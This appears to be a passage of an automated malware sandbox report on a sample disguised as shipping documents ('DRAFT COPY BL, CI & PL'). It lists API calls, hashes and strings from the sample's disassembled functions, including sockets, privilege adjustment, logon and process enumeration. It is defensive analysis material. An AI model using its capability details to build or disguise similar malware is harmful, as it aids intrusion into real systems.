                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                • String ID: $@$SeShutdownPrivilege
                                                                • API String ID: 2234035333-194228
                                                                • Opcode ID: 40cb762e600da53c91d66392a6879aedee5c423c4c898588aa907477f995f091
                                                                • Instruction ID: 820947c515c5191a0da9f33f9d4351da6f25b6e3f3313afb80148124882cf3bb
                                                                • Opcode Fuzzy Hash: 40cb762e600da53c91d66392a6879aedee5c423c4c898588aa907477f995f091
                                                                • Instruction Fuzzy Hash: 7201F7317A96116BEF2A677CAC9AFBF725C9B05750F220920F927E21D2D9615C0087A0
                                                                APIs
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009A62DC
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A62EB
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 009A6307
                                                                • listen.WSOCK32(00000000,00000005), ref: 009A6316
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A6330
                                                                • closesocket.WSOCK32(00000000,00000000), ref: 009A6344
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                • String ID:
                                                                • API String ID: 1279440585-0
                                                                • Opcode ID: c14a0a107ad73c96abcb33b728b662aa8f70ce797d55c383b540c73d730b07e6
                                                                • Instruction ID: 0fe569599bba6a1939e1c174d08fe2e1fddd64416ca1f8f0a7941207abf065f4
                                                                • Opcode Fuzzy Hash: c14a0a107ad73c96abcb33b728b662aa8f70ce797d55c383b540c73d730b07e6
                                                                • Instruction Fuzzy Hash: 3121A0356002049FCF10EF64CD99B6EB7B9EF89720F184269F816A7391CB70AD41DB91
                                                                APIs
                                                                  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
                                                                  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                • _memmove.LIBCMT ref: 00980258
                                                                • _memmove.LIBCMT ref: 0098036D
                                                                • _memmove.LIBCMT ref: 00980414
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 1300846289-0
                                                                • Opcode ID: ff3f146733e7713964fd9dc3146088295ba3bc4858e6ce8b9749bfda5d727685
                                                                • Instruction ID: 16f2142d057c59d3ce04022dae045604d887a75fc63fa4c9f431b16f9042df18
                                                                • Opcode Fuzzy Hash: ff3f146733e7713964fd9dc3146088295ba3bc4858e6ce8b9749bfda5d727685
                                                                • Instruction Fuzzy Hash: 5902A2B0A00209DBCF04DFA5D981AAEBBB5FF84310F158469E80ADB395EB35DD54CB91
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 009319FA
                                                                • GetSysColor.USER32(0000000F), ref: 00931A4E
                                                                • SetBkColor.GDI32(?,00000000), ref: 00931A61
                                                                  • Part of subcall function 00931290: DefDlgProcW.USER32(?,00000020,?), ref: 009312D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ColorProc$LongWindow
                                                                • String ID:
                                                                • API String ID: 3744519093-0
                                                                • Opcode ID: 676b8bfc74c25f9affd87e1d12d4cb2d3e754a66da65e1ace3a6d52077f9aacf
                                                                • Instruction ID: 37e52b8a79e0c2c130eb45b02a57e7e82d984b17b51805ac852530058eb9d551
                                                                • Opcode Fuzzy Hash: 676b8bfc74c25f9affd87e1d12d4cb2d3e754a66da65e1ace3a6d52077f9aacf
                                                                • Instruction Fuzzy Hash: C2A19EB1116544BEE738AB289C44FBF359CDF81397F14061AF502D61B2DB289D41DEB1
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0099BCE6
                                                                • _wcscmp.LIBCMT ref: 0099BD16
                                                                • _wcscmp.LIBCMT ref: 0099BD2B
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0099BD3C
                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0099BD6C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 2387731787-0
                                                                • Opcode ID: 45c040c50ea09c56c509001173a034c8c33462773835c070033363a3022116fe
                                                                • Instruction ID: 705306d98dcd4a983a993c83c329095b40113c2c9dee04719ccd1cc881a64768
                                                                • Opcode Fuzzy Hash: 45c040c50ea09c56c509001173a034c8c33462773835c070033363a3022116fe
                                                                • Instruction Fuzzy Hash: DA51ACB56046029FCB14DF68D591EAAB3E8EF89324F10461DF95A8B3A1DB34ED04CF91
                                                                APIs
                                                                  • Part of subcall function 009A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009A7DB6
                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009A679E
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A67C7
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 009A6800
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A680D
                                                                • closesocket.WSOCK32(00000000,00000000), ref: 009A6821
                                                                 Similarity
                                                                 • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                 • String ID:
                                                                 • API String ID: 99427753-0
                                                                APIs
                                                                 Similarity
                                                                 • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                 • String ID:
                                                                 • API String ID: 292994002-0
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009880C0
                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009880CA
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009880D9
                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009880E0
                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009880F6
                                                                 Similarity
                                                                 • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                 • String ID:
                                                                 • API String ID: 44706859-0
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0099C432
                                                                • CoCreateInstance.OLE32(009C2D6C,00000000,00000001,009C2BDC,?), ref: 0099C44A
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • CoUninitialize.OLE32 ref: 0099C6B7
                                                                Strings
                                                                 Similarity
                                                                 • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                 • String ID: .lnk
                                                                 • API String ID: 2683427295-24824748
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00934AD0), ref: 00934B45
                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00934B57
                                                                Strings
                                                                 Similarity
                                                                 • API ID: AddressLibraryLoadProc
                                                                 • String ID: GetNativeSystemInfo$kernel32.dll
                                                                 • API String ID: 2574300362-192647395
                                                                 Similarity
                                                                 • API ID: __itow__swprintf
                                                                 • String ID:
                                                                 • API String ID: 674341424-0
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 009AEE3D
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 009AEE4B
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 009AEF0B
                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 009AEF1A
                                                                 Similarity
                                                                 • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                 • String ID:
                                                                 • API String ID: 2576544623-0
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0098E628
                                                                Strings
                                                                 Similarity
                                                                 • API ID: lstrlen
                                                                 • String ID: ($|
                                                                 • API String ID: 1659193697-1631851259
                                                                APIs
                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009A180A,00000000), ref: 009A23E1
                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009A2418
                                                                 Similarity
                                                                 • API ID: Internet$AvailableDataFileQueryRead
                                                                 • String ID:
                                                                 • API String ID: 599397726-0
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099B40B
                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0099B465
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0099B4B2
                                                                 Similarity
                                                                 • API ID: ErrorMode$DiskFreeSpace
                                                                 • String ID:
                                                                 • API String ID: 1682464887-0
                                                                APIs
                                                                  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
                                                                  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098882B
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00988858
                                                                • GetLastError.KERNEL32 ref: 00988865
                                                                 Similarity
                                                                 • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                 • String ID:
                                                                 • API String ID: 1922334811-0
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00988774
                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0098878B
                                                                • FreeSid.ADVAPI32(?), ref: 0098879B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0099C6FB
                                                                • FindClose.KERNEL32(00000000), ref: 0099C72B
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009A9468,?,009BFB84,?), ref: 0099A097
                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009A9468,?,009BFB84,?), ref: 0099A0A9
                                                                Similarity
                                                                • API ID: ErrorFormatLastMessage
                                                                • String ID:
                                                                • API String ID: 3479602957-0
                                                                APIs
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00988309), ref: 009881E0
                                                                • CloseHandle.KERNEL32(?,?,00988309), ref: 009881F2
                                                                Similarity
                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                • String ID:
                                                                • API String ID: 81990902-0
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00958D57,?,?,?,00000001), ref: 0095A15A
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0095A163
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                APIs
                                                                • __time64.LIBCMT ref: 0099889B
                                                                  • Part of subcall function 0095520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00998F6E,00000000,?,?,?,?,0099911F,00000000,?), ref: 00955213
                                                                  • Part of subcall function 0095520A: __aulldiv.LIBCMT ref: 00955233
                                                                Similarity
                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                • String ID:
                                                                • API String ID: 2893107130-0
                                                                APIs
                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00994C4A
                                                                Similarity
                                                                • API ID: mouse_event
                                                                • String ID:
                                                                • API String ID: 2434400541-0
                                                                APIs
                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00988389), ref: 009887D1
                                                                Similarity
                                                                • API ID: LogonUser
                                                                • String ID:
                                                                • API String ID: 1244722697-0
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0095A12A
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: dbf1b9fdd52e65bba24b32c69e5d83eb800d2646c0dde2a4e99c4c966c037ed1
                                                                • Instruction ID: 342da62c8309d6cd5c81eaddbe7befef9d1eeb2dfa9ffbb4f50a85bd3ae00aad
                                                                • Opcode Fuzzy Hash: dbf1b9fdd52e65bba24b32c69e5d83eb800d2646c0dde2a4e99c4c966c037ed1
                                                                • Instruction Fuzzy Hash: DCA0113002820CAB8A002B82EC08888BFACEA002E0B008020F80E800228B32A820AA80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ea2af7512672ac103b587eacc97f4bbb47fa8c51f96c1126c47a1066bd3fa620
                                                                • Instruction ID: 955e7ee4459abae49ca7b652d2563fc3c8c65c0e418ca50f80ed2dd68eb07bfb
                                                                • Opcode Fuzzy Hash: ea2af7512672ac103b587eacc97f4bbb47fa8c51f96c1126c47a1066bd3fa620
                                                                • Instruction Fuzzy Hash: BE226630A08946CBCF389E24C494B7F77A9FF41344F29886BD9568B692EBB4DC85C741
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction ID: 8209965c38f37395ad3079406707fdf7c6fd6068825fa11297c658a36c3b5077
                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction Fuzzy Hash: 72C1643620519309DB2DC73B847413EBAA55EA37B271A075EECB2CB1D4EE24C96DD720
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction ID: a8ea197fe82237706ab97e8c3613f9edd5a0541d365629c81f3bf99cd4461676
                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction Fuzzy Hash: 28C152322051930ADB2DC73B847413EBAA55EA37B271A076EDCB2DB1D4EE10D92DD760
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction ID: 3b84d268c97b2d07e0a3e10309050ece2a99c18db3203548c6ca23bf265498f1
                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction Fuzzy Hash: 28C154322091530ADF1DC63B847423EBAA55EA27B371A076EDCB2DB1D4EE14C96DD720
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction ID: e787d4c5994279f3c8b3960844679e5b575301e9e763dc7488e5457436f63935
                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction Fuzzy Hash: 40C1523220519309DF2DC63BC47423EBAA55EA27B371A175ED8B3CB1D5EE20C9699720
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 009A785B
                                                                • DeleteObject.GDI32(00000000), ref: 009A786D
                                                                • DestroyWindow.USER32 ref: 009A787B
                                                                • GetDesktopWindow.USER32 ref: 009A7895
                                                                • GetWindowRect.USER32(00000000), ref: 009A789C
                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009A79DD
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009A79ED
                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7A35
                                                                • GetClientRect.USER32(00000000,?), ref: 009A7A41
                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009A7A7B
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7A9D
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7AB0
                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7ABB
                                                                • GlobalLock.KERNEL32(00000000), ref: 009A7AC4
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7AD3
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 009A7ADC
                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7AE3
                                                                • GlobalFree.KERNEL32(00000000), ref: 009A7AEE
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7B00
                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009C2CAC,00000000), ref: 009A7B16
                                                                • GlobalFree.KERNEL32(00000000), ref: 009A7B26
                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009A7B4C
                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009A7B6B
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7B8D
                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7D7A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                • API String ID: 2211948467-2373415609
                                                                • Opcode ID: 654f95e2aa00756951de589229856eccef1b2114d919d28acdfacd5a46527846
                                                                • Instruction ID: 7c5623d7815b0b25b151cea72c5ca42c513d44da97b862052c5bb7891171299e
                                                                • Opcode Fuzzy Hash: 654f95e2aa00756951de589229856eccef1b2114d919d28acdfacd5a46527846
                                                                • Instruction Fuzzy Hash: 86028F71914105EFDB14DFA8CD99EAEBBB9EF49320F008259F915AB2A1C7709D01DFA0
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,009BF910), ref: 009B3627
                                                                • IsWindowVisible.USER32(?), ref: 009B364B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpperVisibleWindow
                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                • API String ID: 4105515805-45149045
                                                                • Opcode ID: d79dc5c4c5f8097385b3e77b51a0ec8bedcfd7c0c0cc57394e165aa8ad24c155
                                                                • Instruction ID: 72e76558a466b41bba2178afb79fbb768df0aa77f5bd64e3020f33af3dba9dea
                                                                • Opcode Fuzzy Hash: d79dc5c4c5f8097385b3e77b51a0ec8bedcfd7c0c0cc57394e165aa8ad24c155
